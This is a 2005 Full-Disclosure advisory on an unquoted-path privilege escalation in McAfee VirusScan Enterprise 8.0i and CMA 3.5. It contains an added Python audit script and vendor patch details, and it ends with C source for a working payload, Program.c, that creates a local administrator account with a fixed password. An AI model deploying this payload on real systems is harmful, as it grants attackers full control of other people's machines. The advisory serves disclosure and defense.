Subject: [Full-disclosure] Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Date: Thu, 22 Dec 2005 10:13:39 -0700
( Original article: http://reedarvin.thearvins.com/20051222-01.html )

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA
3.5 (patch 5) (http://www.mcafee.com/)

Details:
By default the naPrdMgr.exe process runs under the context of the Local
System account. Periodically it runs through a routine in which it does the
following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file. The path is
passed to the process-creation API without quotes, and because it contains
spaces Windows treats each space as a possible end of the executable name (the
documented CreateProcess behaviour for an unquoted command line): it first
tries to run C:\Program.exe, then C:\Program Files\Network.exe, and only when
neither exists does it run the EntVUtil.EXE file it was originally intending
to run. Any user who can create a file in the root of C:\ can therefore place
an application named Program.exe there and have it run with Local System
privileges by the naPrdMgr.exe process. Source code for an example Program.exe
is listed below.
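To make the search order concrete, the following Python is an added example written for this page, not code from the advisory or from McAfee. It models how Windows resolves an unquoted executable path that contains spaces, lists the hijack candidates an attacker could plant ahead of the real binary, shows that quoting the path (the kind of fix a vendor ships for this class of bug) leaves no candidates, and includes an audit helper that flags candidates whose parent directory the current user can actually create a file in. The path constant is taken from the advisory; the function names, the injectable `can_write` predicate and the fake "writable root" used in the demo are assumptions made for the example.

```python
import ntpath
import tempfile
from typing import Callable, List, Optional

# Constructed input: the unquoted path the advisory says naPrdMgr.exe launches.
ENTVUTIL = r"C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE"


def hijack_candidates(image_path: str) -> List[str]:
    """Return the files Windows tries, in order, before reaching image_path.

    image_path is the executable path alone (no arguments). Without quotes,
    CreateProcess treats every space as a possible end of the executable name
    and appends .exe when that prefix has no extension. A quoted path is
    unambiguous, so it yields no candidates at all.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts)):          # every prefix except the full path
        prefix = " ".join(parts[:i])
        if not ntpath.splitext(ntpath.basename(prefix))[1]:
            prefix += ".exe"                 # no extension on the file name -> .exe appended
        candidates.append(prefix)
    return candidates


def quote_image_path(image_path: str) -> str:
    """The fix: quote the path so there is exactly one way to parse it."""
    path = image_path.strip()
    return path if path.startswith('"') else f'"{path}"'


def default_can_write(directory: str) -> bool:
    """Probe by creating and deleting a temp file; os.access(W_OK) is not a
    reliable directory check on Windows, so an actual create attempt is used."""
    try:
        with tempfile.NamedTemporaryFile(dir=directory):
            pass
        return True
    except OSError:
        return False


def writable_hijack_points(image_path: str,
                           can_write: Optional[Callable[[str], bool]] = None) -> List[str]:
    """Audit helper: the candidates an unprivileged user could really plant.

    can_write is injectable (assumption for this example) so the logic can be
    exercised off the target host; on a real host leave it as the default probe.
    """
    probe = can_write or default_can_write
    return [c for c in hijack_candidates(image_path) if probe(ntpath.dirname(c))]


if __name__ == "__main__":
    print("search order before the real binary:")
    for candidate in hijack_candidates(ENTVUTIL):
        print("  ", candidate)

    # Constructed assumption for the demo: a host where users may create files
    # in the root of C:\ but not under C:\Program Files.
    fake_writable = {"C:\\"}
    print("plantable:", writable_hijack_points(ENTVUTIL, can_write=lambda d: d in fake_writable))
    print("after quoting:", hijack_candidates(quote_image_path(ENTVUTIL)))
```

On a live host, run `writable_hijack_points` over every service ImagePath, scheduled task and product-launched helper path that contains a space; any non-empty result is a Local System escalation if the launching process is privileged.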

Vulnerable Versions:
McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to resolve
the potential exploit. The new plugin is available as a HotFix from McAfee
Tier III Technical Support."

Exploits:

// ===== Start Program.c ======
// Example payload: dropped as C:\Program.exe it is launched as Local System
// by naPrdMgr.exe and uses that context to create a local administrator.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* _MAX_PATH, system() */

INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH * 2 ];

    /* Resolve net.exe through %WINDIR% instead of trusting the PATH
       inherited from whatever launched us. */
    GetEnvironmentVariableA( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintfA( szCmdLine, "%s\\system32\\net.exe user Program Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintfA( szCmdLine, "%s\\system32\\net.exe localgroup Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/